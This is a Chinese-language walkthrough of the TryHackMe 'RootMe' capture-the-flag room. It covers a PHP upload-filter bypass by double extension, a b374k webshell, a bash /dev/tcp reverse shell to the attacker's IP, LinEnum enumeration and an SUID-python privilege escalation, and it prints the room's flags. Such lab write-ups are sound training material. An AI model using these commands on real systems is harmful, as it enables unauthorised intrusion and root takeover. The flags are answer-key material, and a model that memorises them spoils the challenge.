題目網址 : https://tryhackme.com/room/rrootme

目標IP : 10.10.233.205

Scanning

上傳 webshell

  • /panel/ 可以上傳檔案
  • 用 Wappalyzer 可以確定他是 PHP上傳個 b374k.php-
  • 會噴錯,Google翻譯說 PHP是不允許的! (葡萄牙文)使用 php 副檔名解析漏洞測試- Apache 1.x 2.x 文件解析特性BJ4測試檔名 b374k.php.aaa- Google 翻譯 :文件上傳成功!

使用 Webshell

  • 點下面的 Veja! 會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
  • 使用預設密碼就能進入 shell

戳入 Reverse Shell

  • Webshell 滿好用的,但是Reverse shell用起來更爽確認攻擊機 ip 為 10.14.7.198終端機輸入 nc -vlk 7877webshell 的 Terminal 輸入- bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'即可順利連上 Reverse shell- 輸入指令讓他變得更 interactive 一點- python -c 'import pty; pty.spawn("/bin/bash")'

在電腦裡面逛大街

  • user.txt
  • THM{y0u_g0t_a_sh3ll

設法提權

  • 使用內建的上傳功能上傳 LinEnum.sh開權限 chmod +x LinEnum.sh
  • 執行,並存到檔案 ./LinEnum.sh | tee meow.txt
  • 基本上優先注意紅色、橘色的東西找到有趣ㄉ東西!! [+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python- 也就是說 /usr/bin/python 可以用 SUID 執行
  • GTFOBins 找 Python 有 SUID 的提權方法python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

提權成功!!

  • Flag : THM{pr1v1l3g3_3sc4l4t10n}